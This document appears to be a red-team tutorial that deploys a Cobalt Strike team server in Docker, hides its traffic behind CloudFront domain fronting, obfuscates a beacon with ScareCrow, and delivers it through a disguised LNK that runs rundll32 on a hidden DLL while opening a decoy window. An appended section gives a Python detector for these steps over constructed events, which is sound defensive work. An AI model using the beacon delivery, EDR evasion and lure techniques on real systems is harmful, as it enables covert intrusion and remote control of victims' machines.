Clone the repo and build the container

    git clone
    cd cobalt-strike-docker
    docker build -t cobalt-strike .

Docker Compose snippet for the service

    image: cobalt-strike
    container_name: cobalt-strike
    restart: unless-stopped
    networks:
      <network name>:
        ipv6_address: fd00:bbbb::10:2:2:29
    expose:
      - "8080"
      - "8443"
      - "50050"
    environment:
      - VIRTUAL_EXPOSE=false
    volumes:
      - ./../cobalt-strike:/data

Allow CS clients from specific IPs to reach the client port 50050. Example nftables rules for the prerouting chain (add a forward rule if needed):

    define CS_IP =
    ip saddr <allowed IP> ip daddr <CS server public IP> tcp dport 50050 dnat ip to $CS_IP
    ip saddr <aws cloudfront IP> ip daddr <CS server public IP> tcp dport { 8080, 8443 } dnat ip to $CS_IP

Set up CloudFront domain fronting (link 1, link 2)

Choose which headers to include in the cache key; select All to forward everything to the origin CS server.

Download ScareCrow and install dependencies

    ScareCrow_4.11_linux_amd64 ScareCrow
    chmod +x ScareCrow
    apt install openssl osslsigncode mingw-w64 golang-go
    go install

Create a CS listener

Generate a raw beacon with the listener

Obfuscate it with ScareCrow

    ./ScareCrow -I beacon.bin -Loader dll -domain

Create an LNK file, for example with Macro Pack

    echo '"c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer"' | .\macro_pack.exe -G photo.lnk

Edit the LNK file: change the icon and the target

    "C:\Windows\System32\cmd.exe" /c start c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer & C:\Windows\explorer.exe

This runs the beacon and then opens, for example, Explorer if the icon is a folder; play with it (PDF icon, open a legitimate PDF file, ...).

Make the DLL file a bit less conspicuous by setting the Hidden, Read-only and System attributes on it

    attrib +h +r +s /s dpapi.dll
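From the defender's side, the LNK target above, the rundll32 DllRegisterServer call on a DLL in the user's directory and the attrib +h +s step each leave a recognisable trace in endpoint telemetry. The following is an added detection example, not code from the original post or from any of the tools it mentions. It runs three rules over constructed process-creation and file-attribute events; the event field names, the sample events and the trusted-directory list are this example's own assumptions, not a real product's schema.

```python
import ntpath
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample telemetry (not real data). Field names are this example's
# assumption, loosely modelled on process-creation and file-attribute events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # Explorer starts cmd.exe when the user opens the crafted LNK
        "type": "process",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'"C:\Windows\System32\cmd.exe" /c start c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer & C:\Windows\explorer.exe',
        "cwd": r"C:\Users\alice\Downloads",
    },
    {  # rundll32 loads the dropped DLL by a relative path from the LNK's directory
        "type": "process",
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer",
        "cwd": r"C:\Users\alice\Downloads",
    },
    {  # benign: an installer registering its own COM DLL under Program Files
        "type": "process",
        "parent": r"C:\Program Files\Vendor\setup.exe",
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r'rundll32.exe "C:\Program Files\Vendor\vendor.dll",DllRegisterServer',
        "cwd": r"C:\Program Files\Vendor",
    },
    {  # attrib +h +r +s applied to the dropped DLL in a user-writable directory
        "type": "file_attribute",
        "path": r"C:\Users\alice\Downloads\dpapi.dll",
        "attributes": "HIDDEN,READONLY,SYSTEM",
        "image": r"C:\Windows\System32\attrib.exe",
    },
    {  # benign: hidden+system DLL under the Windows directory
        "type": "file_attribute",
        "path": r"C:\Windows\System32\drivers\sample.dll",
        "attributes": "HIDDEN,SYSTEM",
        "image": r"C:\Windows\System32\svchost.exe",
    },
]

# Directories where DllRegisterServer calls and hidden system DLLs are expected
# (assumed list); user profiles, temp and removable media are not on it.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Matches '<dll>,DllRegisterServer' with the DLL path either quoted or bare.
DLLREG = re.compile(r'(?:"([^"]+\.dll)"|(\S+\.dll))\s*,\s*dllregisterserver', re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def resolve(path: str, cwd: str) -> str:
    """Resolve a possibly relative Windows path against the process cwd."""
    if not ntpath.isabs(path):
        path = ntpath.join(cwd, path)
    return ntpath.normpath(path).lower()


def in_trusted_dir(path: str) -> bool:
    return any(path.startswith(p) for p in TRUSTED_PREFIXES)


def detect_lnk_launcher(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """cmd.exe spawned by Explorer that uses '/c start' to chain into rundll32."""
    if ev["type"] != "process" or basename(ev["image"]) != "cmd.exe":
        return None
    if basename(ev["parent"]) != "explorer.exe":
        return None
    cl = ev["cmdline"].lower()
    if "/c start" in cl and "rundll32" in cl:
        return {"rule": "lnk_launcher_cmd_start_rundll32", "cmdline": ev["cmdline"]}
    return None


def detect_rundll32_register(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """rundll32 calling DllRegisterServer on a DLL outside the trusted directories."""
    if ev["type"] != "process" or basename(ev["image"]) != "rundll32.exe":
        return None
    m = DLLREG.search(ev["cmdline"])
    if not m:
        return None
    dll = resolve(m.group(1) or m.group(2), ev["cwd"])
    if in_trusted_dir(dll):
        return None
    return {"rule": "rundll32_dllregisterserver_untrusted_dll", "dll": dll, "parent": ev["parent"]}


def detect_hidden_dll(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """A DLL outside the trusted directories given both Hidden and System attributes."""
    if ev["type"] != "file_attribute":
        return None
    path = ntpath.normpath(ev["path"]).lower()
    attrs = {a.strip().upper() for a in ev["attributes"].split(",")}
    if path.endswith(".dll") and {"HIDDEN", "SYSTEM"} <= attrs and not in_trusted_dir(path):
        return {"rule": "hidden_system_dll_outside_trusted_dirs", "path": path, "by": ev["image"]}
    return None


RULES = (detect_lnk_launcher, detect_rundll32_register, detect_hidden_dll)


def analyze(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event; findings come back in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, `analyze` flags the cmd.exe launcher, the rundll32 call on the relative-path DLL (resolved against the cwd, so `.\dpapi.dll` becomes a path under the user's profile) and the attrib step, while the two Program Files/Windows-directory events pass. The rules key on the parent process, the resolved DLL location and the attribute combination rather than on the file name, so renaming the DLL does not evade them.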